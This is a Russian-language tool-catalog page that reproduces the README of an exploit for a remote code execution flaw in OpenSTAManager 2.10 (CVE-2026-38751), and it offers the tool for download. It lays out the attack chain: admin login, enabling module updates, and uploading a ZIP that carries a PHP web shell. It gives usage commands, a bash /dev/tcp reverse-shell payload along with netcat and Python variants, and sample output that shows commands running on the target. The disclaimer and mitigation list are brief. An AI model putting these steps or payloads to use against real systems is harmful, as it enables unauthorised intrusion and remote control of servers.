Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — OpenSTAManager RCE 漏洞利用 (CVE-2026-38751) | Kitploit
Инструменты/GitHubGitHub/hackthem/openstamanager_rce_exploit-cve-2026-38751-
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаГенерация Шеллкода
GitHub
hackthem/openstamanager_rce_exploit-cve-2026-38751-

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

OpenSTAManager RCE 漏洞利用 (CVE-2026-38751)

Репозиторий
152 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт RCE OpenSTAManager (CVE-2026-38751)

Обзор

Этот Python-скрипт эксплуатирует уязвимость удаленного выполнения кода в OpenSTAManager версии 2.10, идентифицированную как CVE-2026-38751. Эксплойт позволяет аутентифицированным пользователям загрузить вредоносный модуль и выполнить произвольные команды на целевой системе.

Детали уязвимости

  • CVE ID: CVE-2026-38751
  • Product: OpenSTAManager
  • Version: 2.10
  • Type: Удаленное выполнение кода (RCE)
  • Attack Vector: Веб-ориентированный, требует действительной аутентификации

Как работает эксплойт

Эксплойт выполняет следующие шаги:

  1. Аутентификация: Выполняет вход в приложение OpenSTAManager с использованием предоставленных учетных данных
  2. Включение обновлений: Активирует функциональность обновления модулей, которая необходима для эксплойта
  3. Создание вредоносного ZIP: Генерирует ZIP-файл, содержащий:
    • Файл определения модуля (MODULE)
    • PHP-скрипт-шелл (shell.php), который выполняет команды через GET-параметр
c
  • Загрузка модуля: Загружает вредоносный ZIP через интерфейс обновления модулей
  • Проверка эксплуатации: Подтверждает, что шелл доступен и работает
  • Выполнение команд: Либо:
    • Интерактивный режим шелла для ручного выполнения команд
    • Обратное подключение (reverse shell) для установления постоянного соединения
  • Предварительные требования

    • Python 3.x
    • Необходимые пакеты Python: requests, zipfile
    • Действительные учетные данные администратора для OpenSTAManager
    • Сетевой доступ к целевой системе

    Использование

    Базовое использование

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password
    

    Интерактивный режим шелла

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password --interactive
    

    Режим обратного шелла

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
    

    Аргументы

    АргументОписание
    -u, --urlЦелевой URL (обязательный)
    -U, --userИмя пользователя для аутентификации (обязательный)
    -P, --passwordПароль для аутентификации (обязательный)
    --interactiveВойти в интерактивный режим шелла
    --no-cleanupНе удалять файлы шелла после выполнения
    --lhostЛокальный хост для обратного шелла
    --lportЛокальный порт для обратного шелла

    Технические детали

    Процесс эксплуатации

    1. Аутентификация: Скрипт выполняет запрос на вход к конечной точке аутентификации приложения
    2. Включение обновления модулей: Отправляет POST-запрос для включения функциональности обновления модулей
    3. Генерация ZIP: Создает ZIP-архив с:
      • shell/MODULE: Файл конфигурации модуля
      • shell/shell.php: PHP-веб-шелл, выполняющий команды, переданные через GET-параметр c
    4. Процесс загрузки: Использует multipart form data для загрузки вредоносного ZIP в конечную точку обновления модулей
    5. Проверка: Тестирует загруженный шелл, выполняя простую команду, например id, чтобы подтвердить его работоспособность
    6. Выполнение команд: Либо предоставляет интерактивный шелл, либо устанавливает обратное подключение (reverse shell)

    Используемые полезные нагрузки

    Эксплойт пытается использовать несколько полезных нагрузок обратного шелла:

    • Bash reverse shell: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
    • Обратные шеллы Python с использованием сокетных соединений
    • Полезная нагрузка bash в кодировке Base64
    • Обратный шелл Netcat

    Вопросы безопасности

    ⚠️ Отказ от ответственности: Данный эксплойт предназначен только для образовательных и авторизованных целей тестирования безопасности.

    Оценка рисков

    Эта уязвимость позволяет:

    • Выполнение произвольного кода от имени пользователя веб-сервера
    • Потенциальное повышение привилегий
    • Доступ к конфиденциальным данным, хранящимся в системе
    • Возможное перемещение по сети

    Смягчение

    Для защиты от этой уязвимости:

    1. Обновите OpenSTAManager до последней версии
    2. Внедрите надлежащие средства контроля аутентификации
    3. Ограничьте возможности загрузки файлов
    4. Отслеживайте подозрительную активность
    5. Примените сегментацию сети

    Пример вывода

    root@kitploit:~
    [ OpenSTAManager RCE Exploit : ]
    
    Target: http://target.com
    [*] Step 1: Login...
    [+] Login successful: admin
    [*] Step 2: Enable updates...
    [+] Updates enabled
    [*] Step 3: Create ZIP...
    [*] Created in-memory ZIP file
    [*] Shell location: /modules/shell/shell.php
    [*] Step 4: Upload...
    [*] Upload status: 200
    [+] Upload successful
    [*] Step 5: Verify...
    [+] Vulnerability confirmed!
    [+] Shell: http://target.com/modules/shell/shell.php
    [+] Test: http://target.com/modules/shell/shell.php?c=whoami
    
    [*] Entering interactive mode...
    cmd> whoami
    www-data
    cmd> exit
    

    Ссылки

    • GitHub Repository
    • CVE Details

    Лицензия

    Этот эксплойт предоставляется только в образовательных целях. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых не имеете явного разрешения, является незаконным.

    Скачать инструмент